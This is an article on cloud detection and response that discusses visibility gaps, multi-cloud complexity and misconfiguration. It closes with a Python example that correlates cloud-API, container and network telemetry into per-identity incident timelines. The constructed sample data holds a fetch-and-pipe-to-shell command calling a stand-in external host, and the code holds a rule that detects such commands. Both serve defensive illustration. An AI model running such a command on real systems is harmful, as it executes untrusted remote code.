Detecting unexpected behavior in a cloud environment is often challenging because of limited instrumentation and the continual churn of devices and applications. Being able to separate real attacks from everyday ‘noise’ is a critical capability that enterprises must develop when they decide to leverage cloud environments.
Kick over a rock and you’ll find another detection and response solutions provider: network (NDR), endpoint (EDR), and now XDR (which extends EDR with network and other telemetry), alongside SIEM and threat intelligence. Now we have cloud detection and response (CDR), which focuses on, you guessed it, the cloud. CDR does not just provide detection and response for cloud workloads; it gives security operations center (SOC) teams the visibility to monitor the integrity of virtual machines (VMs), containers, cloud APIs, and third-party applications.
Cloud Detection and Response (CDR) is one of the fastest-growing segments in cybersecurity due to the massive increase in the use of SaaS and public cloud services over the last few years. Nearly every organization has moved business systems into the cloud, including email, collaboration, sales, marketing, HR, and other business functions. Because of this transformation, cybersecurity teams must adapt to a radically different threat landscape, one where they have very little control over the networks and security controls on which critical business systems run. Bad actors are increasingly deploying sophisticated attacks, including credential stuffing, social engineering, and spear phishing against users, to gain access to cloud resources. For example, our team has been tracking nearly a 2X increase in attacks against cloud and SaaS providers compared with the same time last year, with Docker containers, Microsoft Azure, and Amazon Web Services (AWS) being the largest targets of threat actors such as TeamTNT and the 8220 Gang.
CDR is promising, but it comes with challenges
Lack of visibility into third-party applications and environments. CDR fills a significant void in enterprise infrastructure, especially for organizations that rely on SaaS, PaaS, or IaaS. However, gaining visibility into, let alone control over, systems not operated by in-house IT teams is challenging and cumbersome, and without that visibility incident response and threat hunting become much harder for SOC teams.
CDR solutions are difficult to deploy in multi-cloud environments. Most organizations use multiple clouds to extend functionality and choice. Unfortunately, deploying across disparate cloud environments adds complexity and cost and makes scaling harder. Security in a multi-cloud environment is more complex than in a single-cloud one: teams must deploy consistent controls and security guidelines across every provider to ensure adequate visibility and prevent costly misconfigurations.
Difficulty monitoring and identifying cloud misconfigurations. The most common causes of cloud data breaches are misconfiguration, stale credentials, and the inability to investigate and mitigate security incidents. Our research indicates the average cost of a non-cloud breach is between $4-5m, whereas a cloud-based data breach costs well over $7m, depending on the value of the information. While CDR is an effective approach to detecting and responding to incidents, more is needed to separate threat signals from the noise coming from third-party providers.
Seeing is understanding
For CDR to be effective, SOC teams need complete visibility: the whole security incident story across the entire estate, built from activity in containers, VMs, endpoints, and network data.
In many cases CDR rounds out the detection and response stack, but it has its challenges. Enterprises must have better visibility into what’s happening within their third-party service environments. CDR can help provide better line of sight into hosted applications, security controls, users and privileges, as well as the activity and security indicators needed to respond to alerts.
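To make the "whole story" point concrete, here is an added example (not code from the original article or from any CDR vendor) that normalizes constructed telemetry from three sources, a cloud API audit log, a container runtime exec log and a network flow record, into one schema, keys every record to the identity it belongs to, and scores a five-minute window per identity. Each event on its own scores below the paging threshold, which is exactly the "noise" problem; only the correlated timeline crosses it. The log fields, the host-to-identity map and the score weights are assumptions for illustration, not any provider's schema.

```python
"""Correlate cloud-API, container and network events into one incident timeline.

Added example, not part of the original article. All sample records below are
constructed for illustration; field names are assumptions, not a vendor schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from ipaddress import ip_address, ip_network

WINDOW = timedelta(minutes=5)   # correlation window per identity
THRESHOLD = 5                   # summed score that turns a timeline into an incident

# Assumption: the platform lets us map a VM/container host to the identity it runs as
# (an instance profile or workload identity). Constructed for this example.
HOST_TO_PRINCIPAL = {"i-0abc": "svc-build", "i-0def": "alice"}

SENSITIVE_API = {"CreateAccessKey", "PutUserPolicy", "AttachRolePolicy", "CreateUser"}
RECON_API = {"GetCallerIdentity", "ListBuckets", "ListUsers", "DescribeInstances"}
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

# Constructed sample telemetry (not real data), already parsed into dicts.
CLOUD_API_EVENTS = [
    {"time": "2024-05-01T10:00:05Z", "principal": "svc-build", "src_ip": "203.0.113.9", "action": "GetCallerIdentity"},
    {"time": "2024-05-01T10:00:30Z", "principal": "svc-build", "src_ip": "203.0.113.9", "action": "ListBuckets"},
    {"time": "2024-05-01T10:01:10Z", "principal": "svc-build", "src_ip": "203.0.113.9", "action": "CreateAccessKey"},
    {"time": "2024-05-01T09:10:00Z", "principal": "alice", "src_ip": "198.51.100.4", "action": "DescribeInstances"},
]
CONTAINER_EVENTS = [
    {"time": "2024-05-01T10:01:40Z", "host": "i-0abc", "exec": "/bin/sh -c curl http://198.51.100.77/x.sh | sh"},
    {"time": "2024-05-01T08:00:00Z", "host": "i-0def", "exec": "/bin/ls"},
]
FLOW_EVENTS = [
    {"time": "2024-05-01T10:01:45Z", "host": "i-0abc", "dst_ip": "198.51.100.77", "dst_port": 80, "bytes": 51200},
    {"time": "2024-05-01T09:00:00Z", "host": "i-0def", "dst_ip": "10.0.0.5", "dst_port": 443, "bytes": 800},
]


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize(api_events, container_events, flow_events):
    """Flatten the three sources into (time, entity, source, detail, score) tuples.
    The score is a per-event suspicion weight; none of them alone reaches THRESHOLD."""
    out = []
    for e in api_events:
        score = 2 if e["action"] in SENSITIVE_API else 1 if e["action"] in RECON_API else 0
        out.append((parse_time(e["time"]), e["principal"], "cloud-api",
                    f'{e["action"]} from {e["src_ip"]}', score))
    for e in container_events:
        cmd = e["exec"]
        # download-and-pipe-to-shell is suspicious on its own but common in build jobs
        score = 2 if ("curl" in cmd or "wget" in cmd) and "| sh" in cmd else 0
        out.append((parse_time(e["time"]), HOST_TO_PRINCIPAL[e["host"]], "container",
                    f'{e["host"]} exec {cmd}', score))
    for e in flow_events:
        dst = ip_address(e["dst_ip"])
        external = not any(dst in net for net in INTERNAL_NETS)
        score = 1 if external and e["dst_port"] != 443 else 0
        out.append((parse_time(e["time"]), HOST_TO_PRINCIPAL[e["host"]], "network",
                    f'{e["host"]} -> {e["dst_ip"]}:{e["dst_port"]} ({e["bytes"]} B)', score))
    return out


def correlate(events):
    """Group events by identity and report, per identity, the highest-scoring WINDOW
    that reaches THRESHOLD, together with the full cross-source timeline."""
    by_entity = defaultdict(list)
    for ev in sorted(events):
        by_entity[ev[1]].append(ev)
    incidents = []
    for entity, evs in by_entity.items():
        best_score, best_span = 0, []
        for t, *_ in evs:
            span = [e for e in evs if t - WINDOW <= e[0] <= t]
            score = sum(e[4] for e in span)
            if score > best_score:
                best_score, best_span = score, span
        if best_score >= THRESHOLD:
            incidents.append({"entity": entity, "score": best_score,
                              "timeline": [f"{e[0].isoformat()} [{e[2]}] {e[3]}" for e in best_span]})
    return incidents


if __name__ == "__main__":
    for inc in correlate(normalize(CLOUD_API_EVENTS, CONTAINER_EVENTS, FLOW_EVENTS)):
        print(f'{inc["entity"]} score={inc["score"]}')
        for line in inc["timeline"]:
            print("  ", line)
```

Run stand-alone, it prints one incident for `svc-build` whose timeline spans all three sources, while `alice`, who produced events in every source too, never crosses the threshold. The design choice worth copying is the normalization step: joining container and flow records back to the identity that owns the host is what lets a SOC analyst read the sequence as one story instead of three unrelated low-severity alerts.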